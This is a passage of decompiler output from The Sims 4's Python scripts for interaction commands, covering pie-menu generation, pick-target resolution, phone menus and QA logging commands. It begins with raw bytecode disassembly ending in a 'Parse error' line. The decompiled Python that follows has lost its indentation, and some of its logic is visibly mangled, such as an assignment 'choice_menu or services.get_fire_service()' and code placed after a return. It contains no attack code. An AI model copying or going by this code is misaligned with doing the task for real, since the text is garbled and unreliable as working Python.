306 CALL_METHOD_1 1 '1 positional argument'
308 STORE_FAST 'wading_interval'
L. 397 310 LOAD_FAST 'wading_interval'
312 LOAD_CONST None
314 COMPARE_OP is-not
316_318 POP_JUMP_IF_FALSE 394 'to 394'
320 LOAD_FAST 'water_height'
322 LOAD_FAST 'wading_interval'
324 LOAD_ATTR upper_bound
326 COMPARE_OP >
328_330 POP_JUMP_IF_FALSE 394 'to 394'
L. 399 332 LOAD_GLOBAL routing
334 LOAD_METHOD SurfaceIdentifier
336 LOAD_FAST 'zone_id'
338 LOAD_FAST 'level'
340 LOAD_GLOBAL routing
342 LOAD_ATTR SurfaceType
344 LOAD_ATTR SURFACETYPE_POOL
346 CALL_METHOD_3 3 '3 positional arguments'
348 STORE_FAST 'ocean_surface'
L. 400 350 LOAD_FAST 'location'
352 LOAD_ATTR clone
354 LOAD_FAST 'ocean_surface'
356 LOAD_CONST ('routing_surface',)
358 CALL_FUNCTION_KW_1 1 '1 total positional and keyword args'
360 STORE_FAST 'ocean_location'
L. 401 362 LOAD_GLOBAL objects
364 LOAD_ATTR terrain
366 LOAD_METHOD OceanPoint
368 LOAD_FAST 'ocean_location'
370 CALL_METHOD_1 1 '1 positional argument'
372 STORE_FAST 'ocean_point'
L. 402 374 LOAD_FAST 'potential_targets'
376 LOAD_METHOD append
378 LOAD_FAST 'ocean_point'
380 LOAD_FAST 'ocean_surface'
382 BUILD_TUPLE_2 2
384 CALL_METHOD_1 1 '1 positional argument'
386 POP_TOP
L. 403 388 LOAD_FAST 'ocean_point'
390 STORE_FAST 'pick_target'
392 JUMP_FORWARD 408 'to 408'
394_0 COME_FROM 328 '328'
394_1 COME_FROM 316 '316'
L. 407 394 LOAD_FAST 'potential_targets'
396 LOAD_METHOD append
398 LOAD_FAST 'terrain_point'
400 LOAD_FAST 'routing_surface'
402 BUILD_TUPLE_2 2
404 CALL_METHOD_1 1 '1 positional argument'
406 POP_TOP
408_0 COME_FROM 392 '392'
408 JUMP_FORWARD 460 'to 460'
410_0 COME_FROM 286 '286'
L. 412 410 LOAD_GLOBAL services
412 LOAD_METHOD object_manager
414 CALL_METHOD_0 0 '0 positional arguments'
416 LOAD_ATTR water_terrain_object_cache
418 STORE_FAST 'water_terrain_object_cache'
L. 413 420 LOAD_FAST 'water_terrain_object_cache'
422 LOAD_METHOD get_nearest_object
424 LOAD_FAST 'position'
426 CALL_METHOD_1 1 '1 positional argument'
428 STORE_FAST 'nearest_obj'
L. 414 430 LOAD_FAST 'nearest_obj'
432 LOAD_CONST None
434 COMPARE_OP is-not
436_438 POP_JUMP_IF_FALSE 476 'to 476'
L. 415 440 LOAD_FAST 'nearest_obj'
442 STORE_FAST 'pick_target'
L. 416 444 LOAD_FAST 'potential_targets'
446 LOAD_METHOD append
448 LOAD_FAST 'pick_target'
450 LOAD_FAST 'pick_target'
452 LOAD_ATTR routing_surface
454 BUILD_TUPLE_2 2
456 CALL_METHOD_1 1 '1 positional argument'
458 POP_TOP
460_0 COME_FROM 408 '408'
460 JUMP_FORWARD 882 'to 882'
462_0 COME_FROM 270 '270'
462_1 COME_FROM 260 '260'
L. 418 462 LOAD_FAST 'potential_targets'
464 LOAD_METHOD append
466 LOAD_FAST 'terrain_point'
468 LOAD_FAST 'routing_surface'
470 BUILD_TUPLE_2 2
472 CALL_METHOD_1 1 '1 positional argument'
474 POP_TOP
476_0 COME_FROM 436 '436'
476_478 JUMP_FORWARD 882 'to 882'
480_0 COME_FROM 100 '100'
L. 421 480 LOAD_FAST 'lot_id'
482_484 POP_JUMP_IF_FALSE 556 'to 556'
486 LOAD_FAST 'lot_id'
488 LOAD_GLOBAL services
490 LOAD_METHOD active_lot_id
492 CALL_METHOD_0 0 '0 positional arguments'
494 COMPARE_OP !=
496_498 POP_JUMP_IF_FALSE 556 'to 556'
L. 422 500 LOAD_GLOBAL sims4
502 LOAD_ATTR math
504 LOAD_METHOD Location
506 LOAD_GLOBAL sims4
508 LOAD_ATTR math
510 LOAD_METHOD Transform
512 LOAD_FAST 'position'
514 CALL_METHOD_1 1 '1 positional argument'
516 LOAD_FAST 'routing_surface'
518 CALL_METHOD_2 2 '2 positional arguments'
520 STORE_FAST 'location'
L. 423 522 LOAD_GLOBAL objects
524 LOAD_ATTR terrain
526 LOAD_METHOD TerrainPoint
528 LOAD_FAST 'location'
530 CALL_METHOD_1 1 '1 positional argument'
532 STORE_FAST 'pick_target'
L. 424 534 LOAD_GLOBAL PickType
536 LOAD_ATTR PICK_TERRAIN
538 STORE_FAST 'pick_type'
L. 425 540 LOAD_FAST 'potential_targets'
542 LOAD_METHOD append
544 LOAD_FAST 'pick_target'
546 LOAD_FAST 'routing_surface'
548 BUILD_TUPLE_2 2
550 CALL_METHOD_1 1 '1 positional argument'
552 POP_TOP
554 JUMP_FORWARD 726 'to 726'
556_0 COME_FROM 496 '496'
556_1 COME_FROM 482 '482'
L. 426 556 LOAD_FAST 'pick_target'
558 LOAD_CONST None
560 COMPARE_OP is-not
562_564 POP_JUMP_IF_FALSE 702 'to 702'
L. 427 566 LOAD_FAST 'pick_target'
568 LOAD_ATTR provided_routing_surface
570 LOAD_CONST None
572 COMPARE_OP is-not
574_576 POP_JUMP_IF_FALSE 702 'to 702'
L. 428 578 LOAD_FAST 'pick_target'
580 LOAD_METHOD is_routing_surface_overlapped_at_position
582 LOAD_FAST 'position'
584 CALL_METHOD_1 1 '1 positional argument'
586_588 POP_JUMP_IF_TRUE 702 'to 702'
L. 429 590 LOAD_FAST 'potential_targets'
592 LOAD_METHOD append
594 LOAD_FAST 'pick_target'
596 LOAD_FAST 'routing_surface'
598 BUILD_TUPLE_2 2
600 CALL_METHOD_1 1 '1 positional argument'
602 POP_TOP
L. 430 604 LOAD_FAST 'pick_target'
606 LOAD_ATTR provided_routing_surface
608 STORE_FAST 'new_routing_surface'
L. 431 610 LOAD_GLOBAL sims4
612 LOAD_ATTR math
614 LOAD_METHOD Location
616 LOAD_GLOBAL sims4
618 LOAD_ATTR math
620 LOAD_METHOD Transform
622 LOAD_FAST 'position'
624 CALL_METHOD_1 1 '1 positional argument'
626 LOAD_FAST 'new_routing_surface'
628 CALL_METHOD_2 2 '2 positional arguments'
630 STORE_FAST 'location'
L. 438 632 LOAD_FAST 'sim'
634 LOAD_CONST None
636 COMPARE_OP is-not
638_640 POP_JUMP_IF_FALSE 726 'to 726'
L. 439 642 LOAD_GLOBAL posture_graph
644 LOAD_METHOD is_object_mobile_posture_compatible
646 LOAD_FAST 'pick_target'
648 CALL_METHOD_1 1 '1 positional argument'
650_652 POP_JUMP_IF_TRUE 726 'to 726'
L. 440 654 LOAD_GLOBAL routing
656_0 COME_FROM 252 '252'
656 LOAD_METHOD test_connectivity_math_locations
658 LOAD_FAST 'sim'
660 LOAD_ATTR location
662 LOAD_FAST 'location'
664 LOAD_FAST 'sim'
666 LOAD_ATTR routing_context
668 CALL_METHOD_3 3 '3 positional arguments'
670_672 POP_JUMP_IF_FALSE 726 'to 726'
L. 441 674 LOAD_GLOBAL objects
676 LOAD_ATTR terrain
678 LOAD_METHOD TerrainPoint
680 LOAD_FAST 'location'
682 CALL_METHOD_1 1 '1 positional argument'
684 STORE_FAST 'pick_target'
L. 442 686 LOAD_FAST 'potential_targets'
688 LOAD_METHOD append
690 LOAD_FAST 'pick_target'
692 LOAD_FAST 'new_routing_surface'
694 BUILD_TUPLE_2 2
696 CALL_METHOD_1 1 '1 positional argument'
698 POP_TOP
700 JUMP_FORWARD 726 'to 726'
702_0 COME_FROM 586 '586'
702_1 COME_FROM 574 '574'
702_2 COME_FROM 562 '562'
L. 444 702 LOAD_FAST 'preferred_objects'
704 LOAD_METHOD add
706 LOAD_FAST 'pick_target'
708 CALL_METHOD_1 1 '1 positional argument'
710 POP_TOP
L. 445 712 LOAD_FAST 'potential_targets'
714 LOAD_METHOD append
716 LOAD_FAST 'pick_target'
718 LOAD_FAST 'routing_surface'
720 BUILD_TUPLE_2 2
722 CALL_METHOD_1 1 '1 positional argument'
724 POP_TOP
726_0 COME_FROM 700 '700'
726_1 COME_FROM 670 '670'
726_2 COME_FROM 650 '650'
726_3 COME_FROM 638 '638'
726_4 COME_FROM 554 '554'
L. 447 726 LOAD_FAST 'pick_target'
728 LOAD_CONST None
730 COMPARE_OP is
732_734 POP_JUMP_IF_FALSE 740 'to 740'
L. 448 736 LOAD_CONST (None, None, ())
738 RETURN_VALUE
740_0 COME_FROM 732 '732'
L. 450 740 LOAD_FAST 'pick_target'
742 LOAD_ATTR provides_terrain_interactions
744_746 POP_JUMP_IF_FALSE 796 'to 796'
L. 451 748 LOAD_GLOBAL sims4
750 LOAD_ATTR math
752 LOAD_METHOD Location
754 LOAD_GLOBAL sims4
756 LOAD_ATTR math
758 LOAD_METHOD Transform
760 LOAD_FAST 'position'
762 CALL_METHOD_1 1 '1 positional argument'
764 LOAD_FAST 'routing_surface'
766 CALL_METHOD_2 2 '2 positional arguments'
768 STORE_FAST 'location'
L. 452 770 LOAD_GLOBAL objects
772 LOAD_ATTR terrain
774 LOAD_METHOD TerrainPoint
776 LOAD_FAST 'location'
778 CALL_METHOD_1 1 '1 positional argument'
780 STORE_FAST 'terrain_target'
L. 453 782 LOAD_FAST 'potential_targets'
784 LOAD_METHOD append
786 LOAD_FAST 'terrain_target'
788 LOAD_FAST 'routing_surface'
790 BUILD_TUPLE_2 2
792 CALL_METHOD_1 1 '1 positional argument'
794 POP_TOP
796_0 COME_FROM 744 '744'
L. 455 796 LOAD_FAST 'pick_target'
798 LOAD_ATTR provides_ocean_interactions
800_802 POP_JUMP_IF_FALSE 882 'to 882'
L. 456 804 LOAD_GLOBAL sims4
806 LOAD_ATTR math
808 LOAD_METHOD Location
810 LOAD_GLOBAL sims4
812 LOAD_ATTR math
814 LOAD_METHOD Transform
816 LOAD_FAST 'position'
818 CALL_METHOD_1 1 '1 positional argument'
820 LOAD_FAST 'routing_surface'
822 CALL_METHOD_2 2 '2 positional arguments'
824 STORE_FAST 'location'
L. 457 826 LOAD_GLOBAL routing
828 LOAD_METHOD SurfaceIdentifier
830 LOAD_FAST 'zone_id'
832 LOAD_FAST 'level'
834 LOAD_GLOBAL routing
836 LOAD_ATTR SurfaceType
838 LOAD_ATTR SURFACETYPE_POOL
840 CALL_METHOD_3 3 '3 positional arguments'
842 STORE_FAST 'ocean_surface'
L. 458 844 LOAD_FAST 'location'
846 LOAD_ATTR clone
848 LOAD_FAST 'ocean_surface'
850 LOAD_CONST ('routing_surface',)
852 CALL_FUNCTION_KW_1 1 '1 total positional and keyword args'
854 STORE_FAST 'ocean_location'
L. 459 856 LOAD_GLOBAL objects
858 LOAD_ATTR terrain
860 LOAD_METHOD OceanPoint
862 LOAD_FAST 'ocean_location'
864_0 COME_FROM 460 '460'
864 CALL_METHOD_1 1 '1 positional argument'
866 STORE_FAST 'ocean_point'
L. 460 868 LOAD_FAST 'potential_targets'
870 LOAD_METHOD append
872 LOAD_FAST 'ocean_point'
874 LOAD_FAST 'ocean_surface'
876 BUILD_TUPLE_2 2
878 CALL_METHOD_1 1 '1 positional argument'
880 POP_TOP
882_0 COME_FROM 800 '800'
882_1 COME_FROM 476 '476'
L. 462 882 LOAD_FAST 'pick_target'
884 LOAD_FAST 'pick_type'
886 LOAD_GLOBAL tuple
888 LOAD_FAST 'potential_targets'
890 CALL_FUNCTION_1 1 '1 positional argument'
892 BUILD_TUPLE_3 3
894 RETURN_VALUE
-1 RETURN_LAST
Parse error at or near `COME_FROM' instruction at offset 462_1
@sims4.commands.Command('interactions.choices', command_type=(sims4.commands.CommandType.Live))
def generate_choices(target_id: int=None, pick_type: PickType=PickType.PICK_TERRAIN, x: float=0.0, y: float=0.0, z: float=0.0, lot_id: int=0, level: int=0, control: int=0, alt: int=0, shift: int=0, reference_id: int=0, referred_object_id: int=0, preferred_object_id: int=0, is_routable: bool=True, _connection=None):
if not alt:
if control:
return 0
if target_id is None:
return 0
zone = services.current_zone()
client = services.client_manager().get(_connection)
sim = _active_sim(client)
shift_held = bool(shift)
context = None
choice_menu = ChoiceMenu(sim)
pick_target = zone.find_object(target_id)
preferred_object = None
if preferred_object_id is not None:
preferred_object = services.object_manager().get(preferred_object_id)
preferred_objects = set() if preferred_object is None else {preferred_object}
pie_menu_action = should_generate_pie_menu(client, sim, shift_held)
show_pie_menu = pie_menu_action == PieMenuActions.SHOW_PIE_MENU
show_debug_pie_menu = pie_menu_action == PieMenuActions.SHOW_DEBUG_PIE_MENU
suppress_social_front_page = False
scoring_gsi_handler = {} if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled else None
if show_pie_menu or show_debug_pie_menu:
if pick_type == PickType.PICK_PORTRAIT or pick_type == PickType.PICK_CLUB_PANEL:
sim_info = services.sim_info_manager().get(target_id)
if sim_info is None:
return 0
if sim is None:
return 0
picked_item_ids = set([target_id])
context = client.create_interaction_context(sim, target_sim_id=target_id)
context.add_preferred_objects(preferred_objects)
potential_interactions = list(sim.potential_relation_panel_interactions(context, picked_item_ids=picked_item_ids))
choice_menu.add_potential_aops(sim_info, context, potential_interactions, scoring_gsi_handler)
client.set_choices(choice_menu)
elif pick_type == PickType.PICK_SKEWER:
sim_info = services.sim_info_manager().get(target_id)
skewer_sim = None
if sim_info is None:
return 0
skewer_sim = sim_info.get_sim_instance()
context = client.create_interaction_context(skewer_sim)
context.add_preferred_objects(preferred_objects)
potential_interactions = list(sim_info.sim_skewer_affordance_gen(context, picked_item_ids={client.active_sim_info.sim_id}))
choice_menu.add_potential_aops(pick_target, context, potential_interactions, scoring_gsi_handler)
client.set_choices(choice_menu)
else:
pass
if pick_type == PickType.PICK_MANAGE_OUTFITS:
context = client.create_interaction_context(sim)
retail_manager = services.business_service().get_retail_manager_for_zone()
potential_interactions = []
if retail_manager is not None:
potential_interactions = list(retail_manager.potential_manage_outfit_interactions_gen(context))
choice_menu.add_potential_aops(pick_target, context, potential_interactions, scoring_gsi_handler)
client.set_choices(choice_menu)
else:
if show_pie_menu:
shift_held = False
else:
position = sims4.math.Vector3(x, y, z)
pick_target, pick_type, potential_targets = _get_targets_from_pick(sim, pick_target, pick_type, position, level, (zone.id), lot_id,
is_routable, preferred_objects=preferred_objects)
if pick_target is None:
return
interaction_parameters = client.get_interaction_parameters()
if potential_targets:
alt_bool = bool(alt)
control_bool = bool(control)
def _add_potential_object_aops(potential_target, routing_surface):
pick = PickInfo(pick_type=pick_type, target=potential_target, location=position, routing_surface=routing_surface,
lot_id=lot_id,
level=level,
alt=alt_bool,
control=control_bool,
shift=shift_held)
context = client.create_interaction_context(sim, pick=pick, shift_held=shift_held)
context.add_preferred_objects(preferred_objects)
potential_aops = list((potential_target.potential_interactions)(context, **interaction_parameters))
choice_menu.add_potential_aops(potential_target, context, potential_aops, scoring_gsi_handler)
return pick
for potential_target, routing_surface in potential_targets:
if potential_target.is_sim:
suppress_social_front_page |= potential_target.should_suppress_social_front_page_when_targeted()
pick = _add_potential_object_aops(potential_target, routing_surface)
if not shift_held:
if sim is not None:
context = client.create_interaction_context(sim, pick=pick, shift_held=shift_held)
context.add_preferred_objects(preferred_objects)
sim.fill_choices_menu_with_si_state_aops(pick_target, context, choice_menu, scoring_gsi_handler)
if len(choice_menu) == 0:
fire_service = services.get_fire_service()
if fire_service.fire_is_active:
fires = fire_service.get_fires_in_potential_targets(potential_targets)
if fires:
potential_target = fires[0]
_add_potential_object_aops(potential_target, potential_target.routing_surface)
client.set_choices(choice_menu)
if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled:
gsi_handlers.sim_handlers_log.archive_pie_menu_option(sim, potential_target, scoring_gsi_handler)
msg = create_pie_menu_message(sim, choice_menu, reference_id, pie_menu_action, target=pick_target, suppress_front_page=suppress_social_front_page)
distributor = Distributor.instance()
distributor.add_event(Consts_pb2.MSG_PIE_MENU_CREATE, msg, True)
num_choices = len(msg.items)
if num_choices > 0:
if pick_type in (PickType.PICK_PORTRAIT, PickType.PICK_SIM, PickType.PICK_CLUB_PANEL):
with telemetry_helper.begin_hook(writer, TELEMETRY_HOOK_CREATE_PIE_MENU, sim=sim) as (hook):
hook.write_int('piid', reference_id)
hook.write_enum('kind', pick_type)
hook.write_int('tsim', target_id)
else:
with telemetry_helper.begin_hook(writer, TELEMETRY_HOOK_CREATE_PIE_MENU, sim=sim) as (hook):
hook.write_int('piid', reference_id)
if pick_target is not None and getattr(pick_target, 'definition'):
hook.write_guid('tobj', pick_target.definition.id)
else:
hook.write_int('tobj', 0)
hook.write_enum('kind', pick_type)
return num_choices
@sims4.commands.Command('interactions.phone_choices', command_type=(sims4.commands.CommandType.Live))
def generate_phone_choices(control: int=0, alt: int=0, shift: int=0, reference_id: int=0, _connection=None):
client = services.client_manager().get(_connection)
sim = _active_sim(client)
if sim is None:
return 0
scoring_gsi_handler = {} if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled else None
msg = None
phone_disabled_tooltip = None
resolver = SingleSimResolver(sim.sim_info)
for phone_test in PhoneTuning.DISABLE_PHONE_TESTS:
test_result = resolver(phone_test.test)
if test_result:
phone_disabled_tooltip = phone_test.tooltip
msg = create_pie_menu_message(sim, None, reference_id, None, failure_tooltip=(phone_disabled_tooltip(sim)))
break
if msg is None:
shift_held = bool(shift)
context = client.create_interaction_context(sim, shift_held=shift_held)
can_queue_interactions = sim.queue is None or sim.queue.can_queue_visible_interaction()
if can_queue_interactions:
pie_menu_action = PieMenuActions.SHOW_PIE_MENU
choice_menu = ChoiceMenu(sim)
choice_menu.add_potential_aops(None, context, sim.potential_phone_interactions(context), scoring_gsi_handler)
client.set_choices(choice_menu)
if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled:
gsi_handlers.sim_handlers_log.archive_pie_menu_option(sim, sim, scoring_gsi_handler)
else:
pie_menu_action = PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP
choice_menu = None
msg = create_pie_menu_message(sim, choice_menu, reference_id, pie_menu_action)
distributor = Distributor.instance()
distributor.add_event(Consts_pb2.MSG_PHONE_MENU_CREATE, msg, True)
with telemetry_helper.begin_hook(writer, TELEMETRY_HOOK_CREATE_PIE_MENU, sim=sim) as (hook):
hook.write_int('piid', reference_id)
hook.write_string('kind', 'phone')
return len(msg.items)
def create_pie_menu_message(sim, choice_menu, reference_id, pie_menu_action, target=None, failure_tooltip=None, suppress_front_page=False):
msg = interaction_protocol.PieMenuCreate()
msg.sim = sim.id if sim is not None else 0
msg.client_reference_id = reference_id
msg.server_reference_id = 0
msg.supress_social_front_page = suppress_front_page
if failure_tooltip is not None:
msg.disabled_tooltip = failure_tooltip
return msg
fire_service = choice_menu or services.get_fire_service()
if fire_service.fire_is_active:
msg.disabled_tooltip = fire_service.INTERACTION_UNAVAILABLE_DUE_TO_FIRE_TOOLTIP()
return msg
else:
if pie_menu_action != PieMenuActions.SHOW_DEBUG_PIE_MENU:
if any(choice_menu.menu_items):
situation_manager = services.get_zone_situation_manager()
for situation in situation_manager.get_all():
if situation.disabled_interaction_tooltip is not None and situation.is_sim_in_situation(sim):
msg.disabled_tooltip = situation.disabled_interaction_tooltip()
return msg
if pie_menu_action == PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP:
msg.disabled_tooltip = PieMenuActions.INTERACTION_QUEUE_FULL_STR(sim)
return msg
create_tokens(msg.category_tokens, sim, target, None if target is None else target.get_stored_sim_info())
if choice_menu:
resolver = InteractionResolver(None, None, target, next(iter(choice_menu))[1].context)
else:
resolver = SingleActorAndObjectResolver(sim, target, source='create_pie_menu_message')
if sim is not None:
icon_override, parent_override, blacklist_icon_tags, blacklist_parent_tags = sim.get_actor_new_pie_menu_icon_and_parent_name(None, resolver)
else:
icon_override = None
parent_override = None
blacklist_icon_tags = set()
blacklist_parent_tags = set()
if choice_menu is not None:
msg.server_reference_id = choice_menu.revision
club_service = services.get_club_service()
tutorial_service = services.get_tutorial_service()
for option_id, item in choice_menu:
aop = item.aop
aop_affordance = aop.affordance
if tutorial_service is not None:
if not tutorial_service.is_affordance_visible(aop_affordance):
continue
if sim is None:
modifier_tooltip = None
else:
modifier_visibility, modifier_tooltip = sim.test_pie_menu_modifiers(aop_affordance)
if not modifier_visibility:
continue
with ProtocolBufferRollback(msg.items) as (item_msg):
item_msg.id = aop.aop_id
context = item.context
allow_global_icon_overrides = not blacklist_icon_tags & aop_affordance.interaction_category_tags
allow_global_parent_overrides = not blacklist_parent_tags & aop_affordance.interaction_category_tags
logger.debug('%3d: %s' % (option_id, aop))
name = (aop_affordance.get_name)((aop.target), context, **aop.interaction_parameters)
name_override_tunable, name_override_result = aop_affordance.get_name_override_tunable_and_result(target=(aop.target), context=context)
if parent_override is not None:
if allow_global_parent_overrides:
name = parent_override(sim, name)
pie_menu_icon = (aop_affordance.get_pie_menu_icon_info)(context=context, **aop.interaction_parameters) if icon_override is None else None
category_key = item.category_key
ignore_pie_menu_icon_override = aop_affordance.is_rally_interaction and pie_menu_icon is not None
if name_override_tunable is not None:
if name_override_tunable.new_pie_menu_icon is not None:
if not ignore_pie_menu_icon_override:
pie_menu_icon = name_override_tunable.new_pie_menu_icon(resolver)
if name_override_tunable.new_pie_menu_category is not None:
category_key = name_override_tunable.new_pie_menu_category.guid64
if name_override_tunable.parent_name is not None:
name = parent_override is None or allow_global_parent_overrides or name_override_tunable.parent_name(sim, name)
if _show_interaction_tuning_name:
affordance_tuning_name = str(aop_affordance.__name__)
name = InteractionCommandsTuning.INTERACTION_TUNING_NAME(name, affordance_tuning_name)
item_msg.score = aop.content_score if aop.content_score is not None else 0
if _show_front_page_score:
name = InteractionCommandsTuning.INTERACTION_FRONT_PAGE_SCORING(name, str(item_msg.score))
item_msg.loc_string = name
tooltip = modifier_tooltip or item.result.tooltip
if tooltip is not None:
tooltip = (aop_affordance.create_localized_string)(tooltip, context=context, target=aop.target, **aop.interaction_parameters)
item_msg.disabled_text = tooltip
elif tutorial_service is not None:
tooltip = tutorial_service.get_disabled_affordance_tooltip(aop_affordance)
if tooltip is not None:
tooltip = (aop_affordance.create_localized_string)(tooltip, context=context, target=aop.target, **aop.interaction_parameters)
item_msg.disabled_text = tooltip
else:
success_tooltip = (aop_affordance.get_display_tooltip)(override=name_override_tunable, context=context, target=aop.target, **aop.interaction_parameters)
if success_tooltip is not None:
item_msg.success_tooltip = success_tooltip
if icon_override is not None and allow_global_icon_overrides:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=icon_override)))
else:
if pie_menu_icon is not None:
item_msg.icon_infos.append(create_icon_info_msg(pie_menu_icon))
elif category_key is not None:
item_msg.category_key = category_key
else:
if item.result.icon is not None:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(item.result.icon))))
if aop.show_posture_incompatible_icon:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(PieMenuActions.POSTURE_INCOMPATIBLE_ICON))))
if club_service is not None and sim is not None:
encouragement, _ = club_service.get_interaction_encouragement_status_and_rules_for_sim_info(sim.sim_info, aop)
if encouragement == ClubRuleEncouragementStatus.ENCOURAGED:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(club_tuning.ClubTunables.PIE_MENU_INTERACTION_ENCOURAGED_ICON))))
else:
if encouragement == ClubRuleEncouragementStatus.DISCOURAGED:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(club_tuning.ClubTunables.PIE_MENU_INTERACTION_DISCOURAGED_ICON))))
handle_pie_menu_item_coloring(item_msg, item, sim, aop, name_override_result)
for visual_target in (aop_affordance.visual_targets_gen)((aop.target), context, **aop.interaction_parameters):
if visual_target is not None:
item_msg.target_ids.append(visual_target.id)
item_msg.pie_menu_priority = aop_affordance.pie_menu_priority
return msg
def handle_pie_menu_item_coloring(item_msg, item, sim, choice, name_override_result):
mood_result = None
mood_intensity_result = None
away_action = choice.interaction_parameters.get('away_action')
away_action_sim_info = choice.interaction_parameters.get('away_action_sim_info')
if away_action is not None:
away_action_sim_current_mood = away_action_sim_info.get_mood()
if away_action_sim_current_mood in away_action.mood_list:
mood_result = away_action_sim_current_mood
mood_intensity_result = away_action_sim_info.get_mood_intensity()
elif item.result.influence_by_active_mood or name_override_result.influence_by_active_mood:
mood_result = sim.get_mood()
mood_intensity_result = sim.get_mood_intensity()
else:
mood_result, mood_intensity_result = item.aop.affordance.get_pie_menu_color(context=(item.context))
if mood_result is not None:
item_msg.mood = mood_result.guid64
item_msg.mood_intensity = mood_intensity_result
@sims4.commands.Command('interactions.select', command_type=(sims4.commands.CommandType.Live))
def select_choice(choice_id: int, reference_id: int=0, _connection=None):
client = services.client_manager().get(_connection)
return client.select_interaction(choice_id, reference_id)
@sims4.commands.Command('interactions.queue')
def display_queue(sim_id: int=None, _connection=None):
output = Output(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('Invalid Sim id {0:08x}'.format(sim_id))
return False
output('Super Interaction State: (num = {0})'.format(len(sim.si_state)))
for si in sim.si_state.sis_actor_gen():
output(' * {}'.format(str(si)))
for subi in si.queued_sub_interactions_gen():
output(' - {}'.format(str(subi)))
output('Interaction Queue State: (num = {0})'.format(len(sim.queue)))
for si in sim.queue:
output(' * {}'.format(str(si)))
output('Running: %s' % sim.queue.running)
@sims4.commands.Command('qa.interactions.list', command_type=(sims4.commands.CommandType.Automation))
def display_queue_automation(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimInteractionData; SimId:None')
return False
elif sim.queue.running is None:
output('SimInteractionData; SimId:%d, SICount:%d, RunningId:None' % (
sim.id, len(sim.si_state)))
else:
output('SimInteractionData; SimId:%d, SICount:%d, RunningId:%d, RunningClass:%s' % (
sim.id, len(sim.si_state), sim.queue.running.id, sim.queue.running.__class__.__name__))
for si in sim.si_state.sis_actor_gen():
output('SimSuperInteractionData; Id:%d, Class:%s' % (si.id, si.__class__.__name__))
@sims4.commands.Command('interactions.reevaluate_head')
def reevaluate_head(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance() if sim_info is not None else None
if sim is None:
output('SimInteractionData; SimId:None')
return False
for interaction in sim.queue:
if interaction.is_super:
interaction.transition = None
sim.queue._get_head()
@sims4.commands.Command('qa.interactions.enable_sim_interaction_logging', command_type=(sims4.commands.CommandType.Automation))
def enable_sim_interaction_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimInteractionToggleOn; SimId:None')
return False
sim.interaction_logging = True
output('[AreaInstanceInteraction] SimInteractionToggleOn; SimId:%d, Logging:%d' % (sim.id, sim.interaction_logging))
@sims4.commands.Command('qa.interactions.disable_sim_interaction_logging', command_type=(sims4.commands.CommandType.Automation))
def disable_sim_interaction_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimInteractionToggleOff; SimId:None')
return False
sim.interaction_logging = False
output('[AreaInstanceInteraction] SimInteractionToggleOff; SimId:%d, Logging:%d' % (sim.id, sim.interaction_logging))
@sims4.commands.Command('qa.interactions.enable_sim_transition_path_logging', command_type=(sims4.commands.CommandType.Automation))
def enable_sim_transition_path_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimTransitionPathToggleOn; SimId:None')
return False
sim.transition_path_logging = True
output('[AreaInstanceInteraction] SimTransitionPathToggleOn; SimId:%d, Logging:%d' % (sim.id, sim.interaction_logging))
@sims4.commands.Command('qa.interactions.disable_sim_transition_path_logging', command_type=(sims4.commands.CommandType.Automation))
def disable_sim_transition_path_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimTransitionPathToggleOff; SimId:None')
return False
sim.transition_path_logging = False
output('[AreaInstanceInteraction] SimTransitionPathToggleOff; SimId:%d, Logging:%d' % (sim.id, sim.interaction_logging))
@sims4.commands.Command('interactions.display_outcomes')
def display_outcomes(sim_id: int=None, _connection=None):
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance() if sim_info is not None else None
client = services.client_manager().get(_connection)
if sim is None:
sim = _active_sim(client)
for si in sim.si_state.sis_actor_gen():
